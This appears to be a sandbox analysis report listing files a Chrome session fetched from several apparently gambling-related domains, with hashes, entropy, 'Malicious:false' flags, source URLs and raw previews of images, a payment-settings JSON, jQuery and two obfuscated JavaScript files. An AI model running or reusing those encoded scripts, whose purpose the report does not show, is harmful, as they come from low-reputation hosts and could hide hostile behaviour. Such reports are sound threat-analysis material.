                                                                                                                                                          SHA1:529652EBE1A624A967F3539445EF3C79ECE66A96
                                                                                                                                                          SHA-256:F1DCAF3509EFF7A7983F4263868D00B2F93B9B65CE8ED9EFB38E636EE4019B2B
                                                                                                                                                          SHA-512:FCD4C8497037855A84872AA69C930E8BA9F27D55E8B813C2AB9273D8A42A4A2E84756E7FEB1C8F5143F99CEB14FF7E5D0D0537B89DD9988E3E17F9FF1ABCEC75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 23:56:06..........................N...........Q...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):722
                                                                                                                                                          Entropy (8bit):7.337404025343351
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7p8vA4iPpT3fZGkQCET1OlAYx3lYtfhWgOYXuQqZQGtWR5okTaHij90W77yJe:q8vA4iPpTZ8CEYljYtfhWgF+FZQ7HNT3
                                                                                                                                                          MD5:BE10E22D6DE55553F0A4E3235C6415E5
                                                                                                                                                          SHA1:370B465AC5B37F3083FDCEC5D5A16D00A8376F83
                                                                                                                                                          SHA-256:674F80DE0A5378191C0D9DD90FA169687D2EFF98FD21078E7EB687B83DA93FC5
                                                                                                                                                          SHA-512:486E2EB1EEF4C77C8053AA2F66296A9EED00DE913423413D93B5406E304D95951DB1C2312274946136F4D6F25878009E8B021014C7B2C626AA4CB4F574C222C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/header_icon.png
                                                                                                                                                          Preview:.PNG........IHDR...............m....}PLTE...L.Oc.kU.oH.Tj.j?.XZ....h.w..).....Zr....D..=..-..$h.ha.]k..u.uq.q[s`BIMKG2...q.qc._.......e.....~....E.$...{..t...V*.e..b.Y.*?e.....3...r..n..k..a..]..Q.......h..X.xG......Y..H.*..8..V..[..W..*a..g.g.xWvvl.th.oi.ld.lc.d..b"@V..H[.H..D.VDG.@u.?`.?.w2"V2.o0.~).z(<i&...du....zy..d.EC..k........y.YL..k.O;..d..S.nA.9%....b..a.rD.;"...................M.{D..@.s=.g6. .............tRNS.DOJ?S;.tljjhf^^\\ZZPPF...........IDAT.....DA.......k.m.m.w..>}'.R...../.2..F..Y...G.l\.......-..R.....|.~....F..#....Mf.....Y..I.n{..".|FX..}..i3)FE)!K.1>fQ......d...z,.......5.7.Kek7..O..c..+N.r..7/n..n....../.v..^..2=.....n.p>..s....gfbr.%.....J....98Z.>I+O...I....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3578
                                                                                                                                                          Entropy (8bit):5.107955736247811
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:G/i9PzJ+vx/GZ0V2f3CjefA6w2c6PY403gdxz11cf:GYPzJs2fSjCA6w2HPY403gdv1cf
                                                                                                                                                          MD5:11AA24B0D5F56402A6C30036FC40CE55
                                                                                                                                                          SHA1:E1919E5B5C58817D1FBA74DC26C3AC8A87C44D7C
                                                                                                                                                          SHA-256:E6AD49E7A361F5332BDAFA9F3C227761AE571A0C1D6010D5A809626C70F19312
                                                                                                                                                          SHA-512:9FAD39556B5094BAABFD86214B6A3E6DEDB20B4BA9199E25C01A668DF511DE3B76979A5F87C3F7391DDD1F7562215190EC2EBB8CAAFA424F954D2F59AE20A6A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":"","domainType":1,"agentCode":"92829052909","snType":1,"iconRel":"","paymentType":1,"h5AppLayerFlag":1,"zone":"KR,JP,PH,ID,TH,VN,KH,MY,MYA,IND,OTH","sn":"kp08","firstPageFlag":1,"forwardUrl":null,"isZone":true,"settings":{"smsLoginFlag":0,"thirdpartyTransferOutLowerThreshold":0,"payChargeFlag":1,"qqPayTag":2,"agentRebateFlag":1,"internChargeFlag":1,"defaultAgentCodeFlag":0,"qqPayTagFlag":0,"auditWithdrawFlag":1,"subTranferToUpFlag":0,"jdPayIndex":0,"alipaySort":"3","iosCertificate":"","phoneCallback":1,"videoProfitDayThreshold":300000,"wechatPayTag":2,"liveChessForbid":0,"qqpayChargeFlag":1,"jdPayTagFlag":0,"internPayTag":2,"userEditFlag":1,"bgChargeFlag":0,"regCaptchaType":"normal","bankBindOption":2,"abandonCouponFlag":1,"wyPayTagFlag":0,"openAutoDrawFlat":2,"transferPaySort":"1","onlineChargeMemoRequire":0,"openUserNameFlat":0,"loginIdRuleType":"1,2,3","openUserFeeFlat":1,"bdPayIndex":0,"openUserPointFlat":0,"usdtWalletFlag":0,"virtualDrawFlag":1,"unionQrSort":"6","
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):43162
                                                                                                                                                          Entropy (8bit):7.953145877023125
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:WTC0nclGUxk45YhUb+TdhiKQc8XfCvHplUR5GZlCKP4CUoKNUaK:Wm0nclJ64cUSTaK38PCvJAoVwC2G
                                                                                                                                                          MD5:369B22647FABC5FFC0211854F258589C
                                                                                                                                                          SHA1:4450C1135E15EDE8AB1361AA187B186F594C5A8F
                                                                                                                                                          SHA-256:6A0549CF5AFB7D4092E4034C163305C38D97DA27777D9710E4E7477DF6BEAB0C
                                                                                                                                                          SHA-512:69D58556A422B3944F14D04A21D6E32B5FC8EC34A55ABBF0F4D39646F711EBD4402E3450E517E958F7E00CA35BEF4E00534B7A5106D8BBDE059ACD11EA0F7E6F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/images/errors/ico-605.png
                                                                                                                                                          Preview:.PNG........IHDR.............\r.f...aIDATx^...%U.7......'.&..a.C.A2..T.%...]..5...~.u..[.]]uE...L(.HP...!....{........<.9...f.....Su.nMw...1....<...#...==T..x.......3.^K...v...8......(...j..z\.z.$..s.^..;u.......q..W..x.RG.x...7.|......1J....=.1S......y...y>n.....$..Bi.2.%"..N.V:...:...x.S...+..V...R{....... t.]..H.z...9l.y......O?....w.1.:...?YA.J.SU./.c.=.x.n.&L. ....Y|.(s.e..j......T*....0.|..{.se`SE.f.B....|..w..................K/....0.....w.;T.wIoo.K....={r.`.h.f...b...8....g.7+.c2.0.0.......d2`.`&.C))..b.2...s....|.~.^e...g...w.c.<.G..t@.:..E.'N<[.?..........A8...5...**.P....`..f..........3I..QF.P..P........G?Z......(3.^:...x&.~...*....DA....7O2..z.@O.K.L.`.d.4....dppP...e..`.X.u~.L.k.q.........v{.....6...'O>1...,5...{@2i.$...:Tgy...88w..c........-.......oP&....mw..2:..3.=KA....9...Kl.Cm.2e.L.6....]..g%.....0....!l..$.m.uj...}.....D._/....eW.......W.....7+.......O.:......p~n....Hf...~.-[..........N|f.2.o...k^.61...:.?..Aj..A..2
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):663
                                                                                                                                                          Entropy (8bit):7.521694983048398
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:6v/7es/6Tn/YPc17zDKWgDaGJeF5t+/qBOotsnmHR5l9y:w/60Pc1/DKWg+GJA5FBBH7l9y
                                                                                                                                                          MD5:EF972EB21813224CC000334C3BC94A01
                                                                                                                                                          SHA1:EE1D39BF57907F6D9B42D140E07BDF1FF85ADD50
                                                                                                                                                          SHA-256:59386AFD3F9245FB3A774C44E4D6C720CD09D3E21F32C28BBEC26958CE2C87DF
                                                                                                                                                          SHA-512:451D4F0DB3D479439A77DA0194C293A4A859986546C68FB92F3BFC980EAC54785AFEC6F7283FC070B0A23C96727A09B37893F3A39918C2E822F944749B762FF1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................IIDATH...K.Q...O.0."3.UEX...] *,.".....*...M.......B.A..$*..Y.VdT...Rj7..o..1...o...9.s.sR*c!9c.....g...8....G.Aj..d9P.....s ?t.".S...C.J...b.=....Z..Jr.S......5}.4.k.v.B.........1?..?q.........\......].......e.d`.P......{@G.Y.,.^...x...S.v.*..h.....N`%...V...R..v.(....#.]iTlSw....N..z)..N.V=.6..P[......}F,..}..;..1..y.....UEL..nQ?G..MF.w..Z.z..|S_.....l.I.V..L..P'...v..j.z6.^..s..$m%0!x..zmp&...K......R.).S`.PE..5............:. ..E.m.......<.......7.yQ.]Q...H."..5jI\.AG...t.Z......n....A.Z..Sg..#...VW...c$....9....+.. ....YP0"...k....Y.,.........S......IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 155 x 155, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):44229
                                                                                                                                                          Entropy (8bit):7.979031888400956
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:yxMsu3tqNNaNRYOGKwZfJpORgjVxD8dsqJFWz9hG/UHRjqO9vfT8Pq:ZXdWNqGKarOYjwW9hMuBv78Pq
                                                                                                                                                          MD5:0BC3317E0C53FC8E1DFB1134A281F9E8
                                                                                                                                                          SHA1:89A21413159CBDEF355BBCA6F98AE6E5F7470A55
                                                                                                                                                          SHA-256:0A6FE83F7764AD9B5AA24C6A8F03F0380213E5225E8274A186C50DC02E976BD8
                                                                                                                                                          SHA-512:B74B3BD7DF326140DDD791C924455C8696B1E99ACC87E7D828EF80B21334FF59D2A9C8031095AEFBDFE7E632E9342AFC5020427B26753FBAF57BED571BD1CDB5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............ua.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.l.u....`S...A.H:...,.,.e..[&...1..I.$.q...e.-.......b...gx.qCU...{....$...K=O?=..{..V-x....>.w.L.=.z..^5%...e.I..........W..s_...C..O...A...*..6p........GT<}+8.s...3......:........?.....t..?.3- .s...3................e[...Z.......].=...j...E.....W...;..po@D..?...?3.{..g8P.......y.....t*....<~._.............r'..`.e`6...y....o.l....7..D. ..L....R..:./6E..I................Uc3w.W?..?+..>............ (../..;..p.y....H..\.jD..P:.L..Y.9..G.".N\<.XB _G....E.*.[...d.......H.....QKV...|.h.B@..G....{.h...............S.4...@.....~B<.......>E.X0.......}.....t>...C.....{..)O.......+....r...D.....+.)0...@....T..@.K......Gf=8...a .8...........M.-Zg........>...O.p.{.a7.A@x...s...a@.Y.M..d...Z.Qo.|@...2.`.NMW{y*....Qz..........v..VBP..=....6.E.a.j......F.%....Ny...!....B!a.P.....=..B..T.T?....A....2....7_p.N..-...Zm.V~>...P#8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1740), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1740
                                                                                                                                                          Entropy (8bit):5.863746419169325
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VE9RvUBzEM5vmLi6gtlM/E307UJsswEwNX85oVbR:VE9RQBmu6gtC77UQNX5bR
                                                                                                                                                          MD5:D41604EED8C01D725D5082FD2039463B
                                                                                                                                                          SHA1:D9843674196CFD4C67E247927C78CD58BFB38094
                                                                                                                                                          SHA-256:5B8264FD10F490EFF4AC621CE175CFD0CE511CFB34A556BCF760B0759499AA8D
                                                                                                                                                          SHA-512:4BC476EAA3CE2FDB70054AD701062AD3E61B10F15780557DC383047313A0777D16791E002150EFAA875300B4B640236020E6D69F04420A79959919AC68CA1A2B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/bonus.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAmAXQBoBvAVQCUBNALwC4AzAVzRgBcBLdTN3K8AlJQC+5AE4BzAJwBPNpx780g4eRRiAROyQgABEm5TePHQG4A8mABWIHgDoAJiFa80IAApSUEECluBUxech0AfQiQJABZFBd2ABsQHSoANygk9hBmAEIABnERS0ypQzQAXhRMHQARFwAOYB0RchBqp3U0NqRq2oKYCFZW6X6dADl6AA9rUfZKzBBMEUwJclsHHkwpJwBbKAgAcRBubkCkVewdXiQAGRQZTzSdMHR9XxQ929TSNsoZKcJihgAAVXh7XIcLh8ARiKSndhSNCGbgAC1uTm4KAAQnZwZDBBikE4YCh2BB0ABJNCsFBOExQIIEkAiADUOkMAD9DIAG50AFOo6cTFKguKDcKDKGFqFaUBHcJFoShkinU2koZjrW4ACU83AAymiQflcMIkHVTlBeElDca8rhheRgOKYGjNbcHk80FLVAJuGJuAB+dGYwHcADC5MpaBpdJWzCJmJ1ettwEq9vIIZJtwtEutqfTuBEkjeaA+fm+Bh9sPU/soZUMvEqWcs3AAZG3uFi0SB1NDfbWA05An4pIGSW5WFBkl3qHwkk4soFuAB1JloTwyQTDqSj/YxJBQQEiZi4SrNpwIpAzpy3HGeFyR9jedD6058NAyDtdq837ESpInxfNAAEE9nJNAg1CW8kF1SCC0KYRSSjNU6QvX8kn9BNeBguCDSNNMMxwnNLXzAjCyQlVo1jFB0JiGdi2LSQyT2CB2HOFxmGWVZ1k2RxuB2fZDhOM4LiuG57keZ5wlLcsvh+HQ/ioMNgTBCEoRUGtZXlRVUWJLFcXxdTExJKjUPpRlmXU9lOR5AUhRFSF0QSJBNTDJ9qPVasZTEEyYM9TwAB9AqzGDvBXERv30gASEwUARZC9m+ASdH1ABRUEIhxawJmofVvFoaxYipdK0gndxp0wpwQIgXg3y
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (59025)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):131378
                                                                                                                                                          Entropy (8bit):5.21841416269645
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:IxG53qhMftEnbNNOLPhTzxiS/1+4XcVMMueeOoBbmFGWM2z1qgxcrsZ7Kya47boY:IUXCFz1qgd7K0eCqWcLJ4kAr
                                                                                                                                                          MD5:111CD393CD76E07CE42A7D95694D82E3
                                                                                                                                                          SHA1:54A4E75D08F63D4165E6F500DFF326A18321E414
                                                                                                                                                          SHA-256:B4973B9C0B87560EE850853ABCF8FC09D9717EBB65CE00287A1DBC7C184C4F91
                                                                                                                                                          SHA-512:D25DC1D74116A484BA88A55C0BA335F1ECBEDE2AB032BBD08DD87EB2604497B386FFF1488A2FB2CCB636E807D6C7E07812A91DBD0B9C699974DECBD8E78F1D8E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/jquery/jquery-2.1.1.js?v=1717580749344
                                                                                                                                                          Preview:/*!. * jQuery JavaScript Library v2.1.1. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. *. * Date: 2014-05-01T17:11Z. */.(function(global,factory){if(typeof module==="object"&&typeof module.exports==="object"){module.exports=global.document?factory(global,true):function(w){if(!w.document){throw new Error("jQuery requires a window with a document")}return factory(w)}}else{factory(global)}}(typeof window!=="undefined"?window:this,function(window,noGlobal){var arr=[];var slice=arr.slice;var concat=arr.concat;var push=arr.push;var indexOf=arr.indexOf;var class2type={};var toString=class2type.toString;var hasOwn=class2type.hasOwnProperty;var support={};var document=window.document,version="2.1.1",jQuery=function(selector,context){return new jQuery.fn.init(selector,context)},rtrim=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,rmsPrefix=/^-ms-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2888), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2888
                                                                                                                                                          Entropy (8bit):5.880648602834631
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V9rQQbI04xAVQLzHXcF4W2sJt/4ydaIltY4SmDk4nD8CHJMBz/eRmnwI49:V9/GAS0F4/sf42a78DPjwzBP49
                                                                                                                                                          MD5:D3570B904AB8E24E9D4554D194A1D9D1
                                                                                                                                                          SHA1:ADBBCFE0676FF24097073D4F5E0DF870A2BDA303
                                                                                                                                                          SHA-256:CC8EEC71D279B68A36B6009B06A631B91307252A5A5A764A110012EE3FF1BF96
                                                                                                                                                          SHA-512:8FEC130B9C3D0A9E3DA01928C8C52586BC0619FAB2C768D576CCEF183322980FF84F6AE20A39B838F7399151221FCB2A015BDFC3CBD847E3F1D1C3E4C8DF6147
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/dialBack.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgHYAGAXQBoBvATSgDcA1ALgDMBXNGAFwEt1MQ5HuS4BKSgCI2SEAAIkXAE49uEgNwB5MACsQ3AHQATECx5oQABUUoIIRVwCemYRID6rkEgCyKQ2wA2IBJUdFD+bCBMAITEAL6iaqGK8gC8XJgSACKGABzAEqLkUGn6aJhIhf5pGcQwECwF5CjVEgBy1AAeGo2KLZlsAPQATI1oKZhQmKKYlLHkWrrcmCj6ALZQEADiIFxcdhU4EkhoAMo7vGgA5sFSMopWKKaBN0gAFijAmTxhAEKwcBJSIVKCp0KwONw+GVxIodmxFGhKGB/pdrBxDABJdaXSJSRT+DIAamAZkMH30AGFMq1XBYAIIAFQAEoSJAMeNiQABaCAwAYwFCrVboAaGb7+ZHwfQQK6iCSxBWFSbTWbzHR6dIrdYQLxsLhQXjoA6UGRcE7vT4/JiKfQAdXiVDJJzYYFWPC44M4huhlCSshAaVePCQai4QaQ+gAJKF/DxDAaUDaY3GDSA6f4CaJ9GGQGV2F6oc5xDwAGQl/xGExQAJcfR0iA8M6KOgqEDS97mClhfz1iD+Jxt4VgHiBfQxiJZnN5iHeosg/R2ayKAA+y8wuBSKR4+lhSBrZYrxhY1f8tYAqrwK28PgyUFAFBlAMyugHfowAIRoB8pUabdN5o+mR+mBRLgoiiPEYEOpQ8b6p6kL8DCcIIpQQ4jpEvphBETBoAE/jkH2sAgO8/jGIoTASM+gDJ8YApoqANJGgBc5oA78rBKsSCXJh2FCEgABKIAAI5sDwsKGNExAcQwwY8GAgTCXMYBcGgAAyKDwNEuDkNIdg+MOUkSPKcwCqsEB6iAQnKjMcwLBqyxrBs2y7Ps0zYEcpznGY1zkLcdgPE8QTudenzin88CAsCoJoDBs7wVw8KIpKcCoig6JYlAOKkfCBISMSpLklSNL0syrLspyPJ8vpwpoKK4qxdK
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2084
                                                                                                                                                          Entropy (8bit):7.828276105941885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:mMa2IDTMJvQ+YXFHesNZ1OA6u9f9X1DUcMfnax1bFIEt44:zcAvQ+YXF+sNZ1OAp9X1Afnc1Zh5
                                                                                                                                                          MD5:6D4ED4AD342225EE6B8505E3E4A47199
                                                                                                                                                          SHA1:1BEDE3976E1DAA3FA605D3073651FF6B32CDD068
                                                                                                                                                          SHA-256:35E1685E841B9F019C86E7DBEC2919365D2D51B5FA9FD85B9F4283FFDB3289CF
                                                                                                                                                          SHA-512:4D4B311E569D6B9AEA582DE128C4410B1D6ADA9DA5E6BA844AFC68007561C4513302AE194B929F62C725CBBB80F4C64048542EF547AF9F8BE84DA4FD01952778
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_tp.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME......)20\S....IDATH..k.]U.....>.{....)R.T..".... b$..0..!.H..G.$..1.0...THH4...%$b.R.......Ph...t..s.Z.8..BK.JN.9...o=.........E.'....B..WU<.k.-....}O.r..{.A#B.j..@e...(P.....G.x..}@........p..K..8.*..r9Q. .?Fqm..x^..Ce.....G.=...F.MO-.....:A~.......f ......DEc.DE..`...fz67......<.Nu..I...m)..D.I^.Vk8.hF....@..).)..4(Y...B.....i."R.......k..\..G.......E.....Q4..1'...p.w...`(t.d...-......M44Q.#...Zl.[.....q..fhm..m.k....T.......[l.vV.B#.y.i.z.Q.....p..=.C..T45QHES*.I.Z.c.^X.};o..3.3....?_V.-...^.v..[Q.8...G..h..`-..-\t...p.Gp.@..A..G.k..#.ymz9S.()Y>..1.G.^....VUm..Pq.U[Ys..:1.\7....C..\v.Ab..N....y[.._.ff!..JTa$.g$.....<0.Icfl.$[.2B.4.#:..Wl..S....N....7K><I*..... .6<u:O<}&..R..7~q/k....O,y...=.9..#U..$_!.^......?{.3.3....7..5O.....4..9..Y.@."].{.5yf|9]=.......s.R.:.G ...;t;...lE$..B5......4.h6...9l~........q....wf..n... ..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 4627
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1163
                                                                                                                                                          Entropy (8bit):7.840917616071798
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:XQY/Ntb79eamFnmO6Ym3lbkp518uFjO7UY+NycWBcJFq7uB7+p6OPJ3ChtFa4:XLv9FS76nbkp3PehvAMV6OPUNf
                                                                                                                                                          MD5:2FF7585D68BC406EC33509CBA6DFAA2B
                                                                                                                                                          SHA1:3A8CAD4B27554C427AAC87EDF157FDD072F9795E
                                                                                                                                                          SHA-256:CFCB96383165A2EDF48B0F084D9B1C77BC44FD2631BDAA2F1DFE975A2501BF4A
                                                                                                                                                          SHA-512:76C45EB4ADBD8B16589167C91BB248D22D7DEE7A178FEC8070B780A0B452FB32BC0C0F19EE62034F80BA2D24CAE1E2EC50D96FAEA4B444A63D5E954593342B15
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/themes/error.css
                                                                                                                                                          Preview:...........X.n.6....>$....\N..........`....8..A...m GS5Q4...X...4.IvM..7..%...DX............jw...G,........u..A.F\......Dw..p..T.$.../{...^....".x`.....\Ptx.p..C.J.:..,...S.....M......y?...o...o...hH.YS.k..F.q;...6..;..qk......'.>Q..$.Nk.._....tx...-...B<u.i.x2.!R...-........:~P.V.....L.4".7Hb...AR..g.P.^...`B....g..Q9Y0...[+.N.E8Q..d..t.O.tM..5 #>.".....5 #M.9ML.Q..-.c'9g...R2qa..q3..T..X.s....M._.Z...*..3...j.V1.e.&.U.e),..1.p....._......V..`1....S...K...F....S.....<.,f.......g.j..4..s2.).7....t..E.e=*K....E?..g\.N@..d.J;...Z.8..8:.....&6O.W-..M1.......{C.m..ni..j..@..vx.X.....-..s|p..um. R.&y......mn~...i..M..7...rs..R.F.ss;..82...!............R4...S.......F........yh...<.....z,.Y...+Csb{D.\E90...8{...z....;.9.....z.O__..8.1R'6s.m=.. ..d...w.s9...d@a....^&F.....A....*..#g@I....v....%.........1u$.3....3.g.2.L..bc...S..E.u......qY...b....}..Oy#O...kp..}..1W..t.....!.]J\5...E......Uz.o.G-.......j...Y.MS..Q.^}.RY..3d..Pe. ...n...r
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1591
                                                                                                                                                          Entropy (8bit):7.180756184592004
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:QvG1hfvWwjx82lY2T3JVp5yJ3V1JbGVU5RQavM9Akhes45qL/WG82UC4mlb:QvMANn2NQJ3DJ0Oma09AhBq624mlb
                                                                                                                                                          MD5:E205026F54D5027F12BA6BC10F84D64E
                                                                                                                                                          SHA1:5919478A9B9BCEAB3FC4784794372B5A63834977
                                                                                                                                                          SHA-256:C1628466BEE5FB7B4195F05610E1231BB6864073856D87914B99F032252A1CF3
                                                                                                                                                          SHA-512:940EA54F41EE1E4C309D2F5B6C5946E026D7C6F6AACD07F252334C40CF8F33276BBD0E49273F815A4BDEEAC88341958426631DBA17A2623C8F50CABB7F846F0B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/nv8.png
                                                                                                                                                          Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:72E5514A50A211E7B6E193861B955A3A" xmpMM:DocumentID="xmp.did:72E5514B50A211E7B6E193861B955A3A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:72E5514850A211E7B6E193861B955A3A" stRef:documentID="xmp.did:72E5514950A211E7B6E193861B955A3A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..$d....IDATx..Ol.Q..g.....kE.n"......sp.'.I%$....^E.E.\.......$.!.$.. TESVUT.nWZ....~_....z.g...w.......9..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 20:17:21], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):45789
                                                                                                                                                          Entropy (8bit):7.563586965229121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ROYyLpPD0PlYyLpPD8sopqVjYydl98NXrHK/ELcoMbacIU3hSom:MXpPDkXpPD8sjX98Vq/ELco8I4hTm
                                                                                                                                                          MD5:1DE7D7A093F4F2F9BC9CEF25C9E9291F
                                                                                                                                                          SHA1:F8CEF7AECD2795DC71D2128F4240C10CD0F47E62
                                                                                                                                                          SHA-256:3E2A9937651D34FD33BC6A1BF0EC6EF953E012D497AFCAF70BE22AE006A3E342
